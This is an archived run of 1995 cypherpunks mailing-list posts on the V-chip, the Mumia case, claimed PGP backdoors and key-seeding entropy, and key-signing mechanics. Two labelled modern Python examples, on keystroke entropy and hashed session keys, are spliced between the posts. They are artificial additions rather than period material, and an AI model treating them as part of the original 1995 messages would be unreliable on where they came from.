From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Mon, 31 Jul 95 17:50:20 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
In-Reply-To: <199508010000.RAA28911@ix3.ix.netcom.com>
Message-ID: <199508010050.RAA19664@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart writes:
 > Blocking commercials would be fun, but would probably be illegal :-),
 > or at least stations that supported it would have trouble getting
 > advertisers.

     Actually, there was a story in the San Jose Mercury News a couple
of weeks ago regarding a product that does just that.  VCRs from at
least two manufacturers will contain a chip and/or firmware that
detects commercials and does not record them.

     My dim memories from a project I did for Sony a couple of years
ago are that commercials are separated by a fixed number of black
frames and some, at least, have tracking information encoded so that
advertisers can monitor how often they are played.  I'll try to dig up
more info.

Regards,

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMB16QO5Yg08fDKehAQHcgAP/c9OCy/jIKXdjDPjfifPHfK9tqRO8EWNY
cAoPH418Otur0jaORTEoyuMwcuZcApm4yzsF+5teLi2p+y/BhAPNH9dSMLNGnVuQ
GUkvKJIHapYyR8dlY+d2AsJWOi3jBCTTt1Spog+3uGcx5ry8ROK91Xr3XUNntcyG
w2bG06dL44c=
=KY6i
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 31 Jul 95 15:14:20 PDT
To: cypherpunks@toad.com
Subject: Rosenberging Mumia
Message-ID: <199507312213.SAA23343@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by jlasser@rwd.goucher.edu (Jon Lasser) on 
Mon, 31 Jul 12:43 PM

>On Mon, 31 Jul 1995, Timothy C. May wrote:
>
>> The Rosenbergs were certainly the Mumia Abu Jamals of 
>their day.
>
>The Mumia case (something friends of mine are more than 
>peripherally acquainted with) seems to be very much in 
>doubt.  Of course, they'll kill him anyway, probably.  
>But I suggest reading E.L. Doctorow's essay on the 
>subject from the NYT of several weeks (months? 
>possibly) back.

------------

In addition to Doctorow's OpEd piece, there have been three 
recent NYPaper articles on the case and a half-page ad.


Here's a judicious benchwarmer from the July 30 article:


   Judge Albert F. Sabo of Common Pleas Court, who conducted
   Mr. Abu-Jamal's first contentious trial, is presiding over
   his hearing for a new trial, and defense lawyers contend
   that not much has changed.

   Judge Sabo, a retired member of the Fraternal Order of
   Police, has sent more people to death row than any judge in
   the state. In the current hearing he has been openly
   contemptuous of the defense.

   "Objection is over-ruled, whatever it was," the judge told
   Mr. Abu-Jamal's lead lawyer, Leonard I. Weinglass, a
   veteran of some of the most politically charged trials of
   recent decades, including that of the Chicago Eight after
   the 1968 Democratic Convention.

   Judge Sabo has sustained virtually every prosecution
   objection while shooting down almost every defense
   objection. At one point, when Mr. Weinglass asked for a
   four-minute recess to locate a crucial witness, Judge Sabo,
   looking at his watch, said, "It's ten-twenty-eight-and-a-
   half. You have until 10:30."

   On Wednesday, the first day of the hearing, Judge Sabo
   turned his back and walked out of the courtroom as another
   defense lawyer, Rachel H. Wolkenstein, was addressing him
   about a legal issue. He came back a few minutes later,
   saying that he could not hear because of the noise coming
   from the street, where a large group of Mr. Abu-Jamal's
   supporters were chanting, "Free Mumia now."

   Richard B. Costello, the president of the Philadelphia
   Fraternal Order of Police, said he did not understand why
   Mr. Abu-Jamal's plight had drawn so much attention and big-
   league legal help.

   "He has more lawyers than Snow White had dwarfs," Mr.
   Costello said. "There's nothing special about this guy.
   He's a cop killer. We've had cop killers before, and,
   unfortunately, we'll have them again."

   Although Judge Sabo has frequently urged the defense to
   hurry, he interrupted the proceedings for several minutes
   to argue and reminisce with a baffled witness about the
   location of a swimming pool in his old neighborhood
   sometime around "1926 or '28."

   As he talked about the pool, a woman in the audience jumped
   to her feet and shouted, "Aren't we here to talk about a
   man's life?" She was escorted from the courtroom. Minutes
   later, the judge asked another question about the pool.
   Several of Mr. Abu-Jamal's supporters were removed for
   refusing to stand when Judge Sabo entered and another was
   taken outside for giving the judge a Nazi-style salute.


----------


To eye the outcry, send a blank msg with subject: MUM_fry.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 18:45:56 PDT
To: cypherpunks@toad.com
Subject: Re: Commercial killers
Message-ID: <ac42d528030210042967@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:00 AM 8/1/95, Robert Hettinga wrote:
>God help me, all of this reminds me of a Carl Sagan book, of all things.
>One of his science fiction characters was said to have made his first
>fortune by building a commercial zapping chip for VCRs.
>
>Butthead Astronomer, indeed...

There have been _billions and billions_ of proposals for commercial
zappers. (Actually, not such a saganesque number, but dozens at least.)

Harry Bartholomew was telling me a year or so ago about some ideas for
detecting volume changes. I think, however, the problem of distinguishing
commercial from non-commercial signal is, I think, a tough one.

My point earlier was not to actually do this, but to suggest that if the
V-chip is to code various kinds of content, then the logic is strong for
commercial content to be similarly coded. (For example, schools often show
taped broadcasts...they might claim that it would be harmful and improper
for children to be exposed to beer commercials during school hours...)

This would gore the ox of the advertisers, so they might quietly have the
whole V-chip thing killed.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 15:59:19 PDT
To: warlord@MIT.EDU (Derek Atkins)
Subject: a hole in PGP
In-Reply-To: <199507311925.PAA28281@toxicwaste.media.mit.edu>
Message-ID: <9507312253.AA27941@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> Hey, Doc...
> 
> > The term paranoid is inappropriate in this context.  Paranoia refers to
> > an irrational fear, while I am expressing a rational concern over a
> > system that has been taken over by a (partially) government funded
> > university and which has not been properly verified.  The history of
> > cryptography (as they say) is (quite literally) littered with the dead
> > bodies of people killed because somebody else thought a cryptosystem was
> > good enough when it was not. 
> 
> If you are concerned that someone put a hole or backdoor in PGP, then
> go grab the source and take a look for yourself.  That's why the code
> is available.  If you can't understand it, then you probably have no
> real right to complain!  However if you are still paranoid (and yes, I
> do believe this is an irrational fear, being the person who maintains
> the MIT PGP development sources) then go find someone who can
> understand it and ask them.
> 
> As a side note, PGP does not go out of its way to choose "good" primes
> over other primes.  Take a look at genprime.c and read the comment
> near the top of the file.  It explains why.

My assertion regarding weakness of the key generation algorithm was not
related to the response you gave.  As a result, it appears that you are
avoiding the issue.  This looks bad if you are, as you claim, maintaining
a legitimate algorithm.  Perhaps you would be better served by addressing
the specifics of my comments - to wit: What makes you think PGP's method
of getting seeds does not lead to a limited key space that is within the
realm of modern computers to search?

	Your assertion that I could find the backdoor by inspecting the
program is the wrong tactic for secure programs.  If you want people to
believe that a program is secure, you had better come up with good
reasons that it is secure, and not hide behind "if you can't find any
holes, it must be secure".

	Clever back doors are not accomplished by an obvious program
change, but rather by the subtle use of some technique that appears to
do one thing when it actually does something else.  As a good example, a
subtle interaction with the rest of the environment could modify the key
generation algorithm after it is loaded.  Unfortunately, PGP is too
large to verify against such back doors, so I ask again:

	Why (specifically) do you think the MIT version of PGP has no
backdoors and is not subject to attacks such as the one outlined in my
previous posting?

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 31 Jul 95 16:23:22 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <v02120d01ac431417e9c5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:53 PM 7/31/95, Dr. Fred said:
>        Why (specifically) do you think the MIT version of PGP has no
>backdoors and is not subject to attacks such as the one outlined in my
>previous posting?

<Metzger_mode("on")>

I've been watching this gark long enough, I think.

Look. If you're qualified, look at the PGP source and vet it yourself. If
you aren't qualified, figure the market to be efficient in this instance
and assume the stuff works.

Stop wasting our time and bandwidth harassing the MIT folk about whether or
not their code is clean. Such posturing won't wash around here.

<Metzger_mode("off")>

Seriously, it may be an appeal to authority, but it can safely be assumed
that PGP is clean, and that MIT is *not* involved with the NSA and the Red
Leptons in a conspiracy to spy on our alt.binaries.pictures.erotica.stoats
postings.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 19:26:06 PDT
To: cypherpunks@toad.com
Subject: Attacks on PGP
Message-ID: <ac42d74b05021004a9dd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Things are heating up between Fred Cohen and some of the rest of the list.

I don't believe MIT is in collusion with the NSA or any other government
agency to deliberately weaken or cripple PGP. I base this on having dealt
with some of the MIT folks, with the various source code analyses folks
have done, etc.

However, I think it's a perfectly *fine* idea for some group to launch a
cryptanalytic attack on PGP, or an attack based on any other approaches.
This is the "tiger team," or "Team B" approach to finding flaws and
weaknesses.

I don't take the security of PGP only on faith, though analyzing it is not
my bag, as they say. Rather, I use the Popper/Bartley notions of
falsifiability and see truth as a process, not a state. Seeing lots of
source code available, independent compilations on various machines, and
believing neither Zimmermann nor Atkins nor Schiller, etc., would consent
to inserting back doors into PGP, I am thus led to _believe_ that PGP is
probably not so affected. Doesn't mean it isn't so, but I'm not overly
worried about it.

Still, more studies and technical attacks (technical, not verbal) would be
welcome.

One of the problems we in the "civilian cryptography" sector face is that
we don't have much activity in cryptanalysis. (We've talked about this
several times before, before Fred Cohen joined the list, for example.) The
NSA and other intelligence agencies have not only code makers, they also
have code _breakers_ (such as modern ciphers are breakable, which hasn't
been the case much lately, if Bamford and Kahn are to be believed).
Probably entire groups whose only job is to try to break the systems
devised by others. (Modern ciphers are not as prone to breakage as earlier
ciphers were, for technical reasons, so I suspect the number of
cryptanalysts has shrunk since the good old days when they had more
successes...there may only be a small contingent left...)

The lack of cryptanalysis papers at "Crypto" has been striking...I was told
that the program committee considers cryptanalysis to be less important
than original research. (I can see the rationale in this, as Crypto is an
academic/research conference, and there are really no "engineering" crypto
conferences. And cryptanalysis might not even fit into an engineering
conference very well, as cryptanalysis is traditionally a sort of
"hobbyist" activity--if you've read Kahn you'll know what I mean.)

Crypto comes in various flavors, from hardware implementations, to number
theory, to Unix/IETF sorts of standards, to digital cash, and even to
statistical analysis. It is dangerous to have a "monoculture" in which one
topic is the trendy one and everyone is urged to work on that (whether the
"that" is PGP or Java or anything else equally trendy).

Most of the activity has been on adding hooks to PGP to make it usable in
other programs, or on remailers. Not as much effort has gone into proofs of
validity, systems analysis, etc. (Eric Hughes and I talked about this
several years ago, before the Cypherpunks group was formed...the need for
"Viper"-like systems with provably correct components, especially for
digital money, etc.)

If folks think PGP is flawed, or deserves an independent and critical look,
then this is a good project for someone. (I think several such analyses
have been made, however...this doesn't make it impossible for a flaw or
backdoor to exist, but at least the code has been examined by various
folks. I'm personally not too worried, though this has little suasive
value.)

(The Monoculture of Trendy Projects. My own programming mini-project, while
proceeding slowly, is of a pattern extractor and "entropy estimator" for
text. Stuff like measuring patterns, examining clusterings and
author-specific patterns. I'm writing it as a bunch of "critic agents" who
are responsible for different areas of analysis. In SmalltalkAgents. My
point? There will be those who cite the "monoculture" and scoff at anything
not written in C++ for Unix boxes, or not built to be Net-aware from the
gitgo, or not written as applets in Java....oh well, in Digital Walden, one
marches to a different drummer. Better to program the thing I _want_ to
program rather than the things I _don't_ want to program, and hence
_won't_. Final note: it'll be ready for use and maybe demonstration when
it's ready. And ready when it's finished, finished when it's ready.)

I've long appreciated Fred Cohen's work on viruses, so it's nice to have
him on the Cypherpunks list. Maybe Fred can tell us if it's really true
that he was stopped by U.S. Customs and held for many hours at the Canadian
border when going to or returning from a conference where he described
computer viruses....

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 31 Jul 95 16:42:02 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199507312339.TAA10743@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac425d4208021004ef6c@[205.199.118.202]>, tcmay@sensemedia.net
(Timothy C. May) wrote:

>However, to help derail this V-chip being mandated, what if we (I mean
>activists, writers of columns, etc.) "insisted" that _commercials_ be
>similarly labelled?

I love it.  Great idea, Tim!

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMB1pgCoZzwIn1bdtAQFwRgF/YBsyqIwF34uxmZgxwzSfTeVcxOtnYe+J
ISSPgnB97QQqPUjYF0oO7T70wLXVwL21
=MEBo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 31 Jul 95 16:40:47 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9507312253.AA27941@all.net>
Message-ID: <199507312340.TAA02533@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 	Your assertion that I could find the backdoor by inspecting the
> program is the wrong tactic for secure programs.  If you want people to
> believe that a program is secure, you had better come up with good
> reasons that it is secure, and not hide behind "if you can't find any
> holes, it must be secure".

This is where you are very wrong.  I am not saying that "if you can't
find any holes it must be secure".  What I am saying is that the
source is available, and thousands of people have looked at the
source, and none of them have found any holes in it.

>  - to wit: What makes you think PGP's method
> of getting seeds does not lead to a limited key space that is within the
> realm of modern computers to search?

How do you propose that a user's keystrokes can be analyzed?  If you
assume that the PC's internal clock speed >> typing speed (which is a
good assumption -- how many keystrokes/second can you type?) then you
have a large amount of randomness that can be gained from timing
keystrokes.  Even a good typist will not have an even typestroke!
Have you read RFC 1750?  If not, I would recommend you read it before
you consider continuing this thread!

> 	Why (specifically) do you think the MIT version of PGP has no
> backdoors and is not subject to attacks such as the one outlined in my
> previous posting?

I think it has no backdoors because Jeff Schiller and I (among others)
have looked closely at the random number generator code (he has taken
a much closer look than I) and believe it to be secure.  I also know
that I did not put any backdoors into the code (but why would you
believe me, I must be paid by the government to say this, right?)

As to why I believe it is not subject to attack, I ask you again to go
read RFC 1750.  PGP follows its recommendations fairly closely.  There
is only one place where PGP fails to follow, and that is that PGP does
expose the bucket of random bits, rather than mixing them before
exporting them.  However I do not believe that this would affect the
generation of PGP Public Keys.

-derek

PS: In what field is your Doctorate?
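
Added example, not part of the message above and not PGP's code: a small min-entropy estimate showing why the "clock speed >> typing speed" assumption matters when keystroke timing is used as a seed source. The keystroke gaps are constructed sample data, and the coarse clock period is an assumption (the roughly 18.2 Hz default PC timer tick).

```python
import math
from collections import Counter

# Constructed sample: gaps between successive keystrokes, in microseconds.
KEY_GAPS_US = [143207, 98411, 201873, 120054, 87659, 176322, 132918, 110745,
               95236, 158601, 189477, 101390, 124863, 167012, 139584, 92171]

FINE_CLOCK_US = 1        # assumed microsecond-resolution counter
PC_TICK_US = 54925       # assumed coarse clock: the ~18.2 Hz PC timer tick


def timestamps(gaps_us):
    """Turn inter-keystroke gaps into absolute event times (microseconds)."""
    t, out = 0, []
    for gap in gaps_us:
        t += gap
        out.append(t)
    return out


def observed_gaps(gaps_us, clock_period_us):
    """Gaps as measured by a clock that only advances every clock_period_us."""
    ticks = [0] + [t // clock_period_us for t in timestamps(gaps_us)]
    return [b - a for a, b in zip(ticks, ticks[1:])]


def min_entropy_per_sample(samples, low_bits=8):
    """Min-entropy (bits) of the low-order bits of each sample.

    Uses the most frequent value only, which is the conservative measure for
    key material. With n samples the result can never exceed log2(n), so a
    real assessment needs far more data than this constructed set.
    """
    mask = (1 << low_bits) - 1
    counts = Counter(s & mask for s in samples)
    p_max = max(counts.values()) / len(samples)
    return -math.log2(p_max)


def keystrokes_for(target_bits, bits_per_keystroke):
    """Keystrokes needed to collect target_bits at the estimated rate."""
    return math.ceil(target_bits / bits_per_keystroke)


if __name__ == "__main__":
    for name, period in (("fine", FINE_CLOCK_US), ("coarse", PC_TICK_US)):
        h = min_entropy_per_sample(observed_gaps(KEY_GAPS_US, period))
        print(f"{name:6s} clock: {h:.1f} bits/keystroke, "
              f"{keystrokes_for(128, h)} keystrokes for a 128-bit seed")
```

With the coarse clock most gaps collapse to the same two or three tick counts, so the same typing yields far less seed material per keystroke.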




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 31 Jul 95 16:43:54 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <199507312341.TAA10813@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507311827.NAA25455@snoopy.vetmed.auburn.edu>,
fstuart@vetmed.auburn.edu (Frank Stuart) wrote:

>I hadn't thought of that before.  I wonder how many kids will get
>zapped trying to bypass the chip on the inside.

Not half as many as will be arrested and convicted for "illegal
consumption of adult TV while underage" once bypassing such a chip will
inevitably be made a crime.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMB1qGyoZzwIn1bdtAQFiSQF/WUIZE345ZeNS7sy90zMUaZ9OoagnJSmn
VV2ZwXq20Ch+kbUmDTjf70twbKnu/i29
=s8TG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cwalton@earthlink.net (Conrad Walton)
Date: Mon, 31 Jul 95 19:47:06 PDT
To: cypherpunks@toad.com
Subject: Re: The Net (short movie review)
Message-ID: <v01520c00ac43451fe01a@[204.80.138.58]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:11 AM 7/31/95, Sandy Sandfort wrote:
>
>I hope the movie is very popular.  It helps us by inducing
>healthy cynicism with a dash of paranoia.

I've been talking with a friend for years about PGP and crypto stuff. He
wasn't interested. Yesterday, he saw The Net. Now he can't wait to learn
how to use it.

This is a good thing. I hope it's a popular movie too.

Conrad Walton | cwalton@earthlink.net | http://XXX.XXXXXXXXX.XXX/~XXXXXXX/
------------------------------------------------------------------------------
Without JOY, there is no STRENGTH.
Without STRENGTH, all other virtues are worthless.     Edward Abbey







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 31 Jul 95 16:54:53 PDT
To: jfmesq@ibm.net (James F. Marshall)
Subject: Re: Public Key Confusion
In-Reply-To: <199507312339.XAA100594@smtp-gw01.ny.us.ibm.net>
Message-ID: <199507312354.TAA02802@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


When you want to sign a key, you should use "pgp -ks".  You should
never clearsign a public key -- it buys you absolutely nothing other
than saying that "I saw this key at some point, and this message
(which is a public key block) came from me".  

Have you signed your own key using "pgp -ks"?  Have you extracted your
key (using "pgp -kxa") since you signed it?  Or did you only extract
it before you signed it?  This would be the cause of the confusion.

If you sign a key, the signature gets attached to the key certificate.
However you do not need that signature in order to _use_ the key.  So,
people to whom you gave your key without a signature can still use
that key, it just doesn't have your signature on it.

As for the keyserver, it _ONLY_ accepts keys; if you clearsign your
key before you send it, then you are not sending a key, you are
sending a message that contains a key.  This is not the same thing.
That is why the keyserver rejected it.

> Should I just stop distributing the .asc version and only let people
> have the longer version extracted from my public keyring?  Is that the
> properly signed copy?

If you performed the pgp -ks, then you should re-perform the pgp -kxa
and distribute the newly extracted key.

I hope this answers all your questions.  All of this, and more, should
be explained in the PGP Documentation which is included with PGP.

Good Luck.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Mon, 31 Jul 95 20:07:13 PDT
To: warlord@MIT.EDU (Derek Atkins)
Subject: hunting for no hole in PGP
Message-ID: <9508010307.AA21546@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>How do you propose that a user's keystrokes can be analyzed? 
        
I have an idea. (many voices groaning...)  The "reduced keyspace" 
and the "subliminal channels" fear both come from the mysterious 
process of choosing the 128-bit IDEA key. The other bogeyman that 
I hear the most about in PGP is the public/private  key generation.  
Random numbers scare people, including me.

Could PGP use an IDEA key that is the MD5 hash of the "random number" 
(the way it is currently calculated) concatenated with the message 
itself?  It would be easy to verify that the correct key had been selected.  
It would be impossible for some "ghost" in the random number routines 
to use a predictably reduced keyspace, or to send subliminal data, 
because its output never (directly) gets sent.  Something similar could 
be done during public/private key generation.

Have the PGP folks considered doing something similar?  Sometimes 
this seems like a good idea to me, and other times it looks like 
useless effort and one more opportunity for something to go wrong.






 
Rick F. Hoselton  (who doesn't claim to present opinions for others)
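
Added example, not part of the message above and not PGP's code: a sketch of the proposal in this post, deriving the 128-bit session key as MD5(RNG output || message), compared with using the RNG output directly. The crippled RNG, the function names and the sample messages are constructed for illustration; MD5 is used only because the post names it.

```python
import hashlib
import hmac

KEY_BYTES = 16  # IDEA takes a 128-bit key; MD5 also outputs 128 bits


def crippled_rng(call_index: int) -> bytes:
    """Constructed stand-in for a subverted RNG: only 256 possible outputs."""
    return hashlib.md5(b"crippled" + bytes([call_index % 256])).digest()


def direct_session_key(rng_output: bytes) -> bytes:
    """Baseline: the RNG output is the session key."""
    return rng_output[:KEY_BYTES]


def bound_session_key(rng_output: bytes, message: bytes) -> bytes:
    """Proposal from the post: hash the RNG output together with the message."""
    return hashlib.md5(rng_output + message).digest()


def verify_bound_key(key: bytes, rng_output: bytes, message: bytes) -> bool:
    """An auditor holding the RNG output and message can recompute the key."""
    return hmac.compare_digest(key, bound_session_key(rng_output, message))


def count_distinct_keys(messages, bind: bool) -> int:
    """How many different session keys the crippled RNG yields over messages."""
    keys = set()
    for i, msg in enumerate(messages):
        r = crippled_rng(i)
        keys.add(bound_session_key(r, msg) if bind else direct_session_key(r))
    return len(keys)


def candidates_if_message_known(message: bytes) -> set:
    """Caveat: hashing adds no entropy. If the message is known or guessable,
    the key space is still bounded by the RNG's 256 possible outputs."""
    return {bound_session_key(crippled_rng(i), message) for i in range(256)}


# Constructed sample messages.
SAMPLE_MESSAGES = [b"constructed message #%d" % i for i in range(1000)]

if __name__ == "__main__":
    print("direct keys:", count_distinct_keys(SAMPLE_MESSAGES, bind=False))
    print("bound keys: ", count_distinct_keys(SAMPLE_MESSAGES, bind=True))
    msg = SAMPLE_MESSAGES[7]
    key = bound_session_key(crippled_rng(7), msg)
    print("auditor check:", verify_bound_key(key, crippled_rng(7), msg))
    print("candidates when message is known:",
          len(candidates_if_message_known(msg)))
```

The RNG no longer chooses key bits directly, so it cannot steer them, but the total key space is still limited by RNG outputs times plausible messages.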




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 17:14:30 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: a hole in PGP
In-Reply-To: <v02120d01ac431417e9c5@[199.0.65.105]>
Message-ID: <9508010008.AA02790@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> At 6:53 PM 7/31/95, Dr. Fred said:
> >        Why (specifically) do you think the MIT version of PGP has no
> >backdoors and is not subject to attacks such as the one outlined in my
> >previous posting?
> 
> <Metzger_mode("on")>
> 
> I've been watching this gark long enough, I think.
> 
> Look. If you're qualified, look at the PGP source and vet it yourself. If
> you aren't qualified, figure the market to be efficient in this instance
> and assume the stuff works.

One of the several points I tried (apparently unsuccessfully) to make is
that with a program that large, it is impractical to verify that there
are no subtle back doors - regardless of how knowledgeable or skilled
you or I may be.  Your "assumption of security" perspective is an
inappropriate one unless you are trying to get people to use something
that is not secure. 

> Stop wasting our time and bandwidth harassing the MIT folk about whether or
> not their code is clean. Such posturing won't wash around here.

The headers on the postings allow you to ignore them, but in the
meanwhile, the subject matter is in line with this forum, and the
questions are legitimate.  You will have to do better than to appeal to
authority to convince anyone that MIT's version of PGP is secure.

> <Metzger_mode("off")>
> 
> Seriously, it may be an appeal to authority, but it can safely be assumed
> that PGP is clean, and that MIT is *not* involved with the NSA and the Red
> Leptons in a conspiracy to spy on our alt.binaries.pictures.erotica.stoats
> postings.

Why (specifically) do you think so? Because you claim it? Because the
MIT maintainer claims it? You say MIT is not associated with the NSA,
but they have historically been funded by the NSA and other federal
agencies for work on information security.  Do you really think that the
only information protected by PGP is dirty pictures? Do you somehow
think that MIT and the NSA are above that sort of thing? All you have to
do is look at history, and it should be clear that this appeal to
authority is often used by those trying to cover things up.  If you know
something about PGP's security that you aren't telling us, don't beat
around the bush about it.  Come out and say it.  Tell us that you have
proven that PGP has no backdoors and what method you used to do that. 
Tell us that you have hand verified all the code and that none of it
overwrites the key generation process and tell us how you verified it.

It cannot be safely assumed that any program is clean or that any one
person or group is not involved with intentionally subverting security.
That violates the fundamental principles of information protection.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 20:12:45 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: Attacks on PGP
Message-ID: <ac42e8ea06021004cdb1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:51 AM 8/1/95, Matt Blaze wrote:

>Tim,
>
>My impression (based on reviewing papers for the last few CRYPTOs and
>EUROCRYPTs) is that the reason for the lack of "practical" papers is
>primarily that not very many of them get submitted.  In fact, I think

Right, but it's a kind of vicious circle. What I meant about cryptanalysis
not really being "academic" is that not much status attaches to having broken
a specific message.

>there actually are a fair number of cryptanalysis papers at CRYPTO,
>at least compared with the even smaller number of papers there that
>describe new ciphers.  Anyway, cryptanalysis IS part of the mainstream
>of the academic crypto world these days (consider differential
>cryptanalysis, linear cryptanalysis, etc.)

I guess this is my bias, as I think of the "differential cryptanalysis" as
not really being cryptanalysis :-}. In the sense that it's basic research
unto itself, not the grungy cracking of an actual cipher.

But you're right that the stuff on Wiener's estimates for a DES-cracking
machine, on the differential cryptanalysis work, etc., _does_ make it into
Crypto. Ditto for breaking ciphers (showing them to be flawed). I just
never see papers describing actual attacks on specific systems...maybe
those who do such things are talking?

I guess the bottom line of what I'm saying is that if some person or group
wants to be a "tiger team" to try to find flaws in PGP, to try to break it,
this would be a nifty thing. I doubt anyone on this list disagrees.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 18:33:39 PDT
To: enzo@ima.com
Subject: Zimmermann legal fund
In-Reply-To: <Pine.LNX.3.91.950731115906.7803A-100000@ima.net>
Message-ID: <199508010129.AA00881@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Mon, 31 Jul 1995 12:12:16 +0800 (HKT)
   From: Enzo Michelangeli <enzo@ima.com>

   How could it be worse than with the U.S. of A.?? ;-)

OK... think about Venezuela. It has bad inflation. It has laws against
converting local currency to US dollars on the black market, which is
basically defined as any agency/person/corporate entity exchanging at
a worse rate than the government rate (at least in Venezuela itself;
you can pay your foreign creditors in Bolivars and exchange them on
the open market for twice the official exchange rate); all
government-rate currency transactions must go through a special
currency review board that checks to see if you _really_ need to
exchange currency. It is illegal to bribe this board and impossible to
get a request acknowledged inside a year without bribery (if it isn't
denied because you didn't bribe the members of the board).

Of course, one day the U.S. may be this bad.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 31 Jul 95 18:35:53 PDT
To: bdavis@thepoint.net
Subject: FBI shirts...
In-Reply-To: <Pine.D-G.3.91.950731001926.21909A-100000@dg.thepoint.net>
Message-ID: <199508010131.AA01279@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Hmmph. How boring. If I had the money, I think I'd buy you one
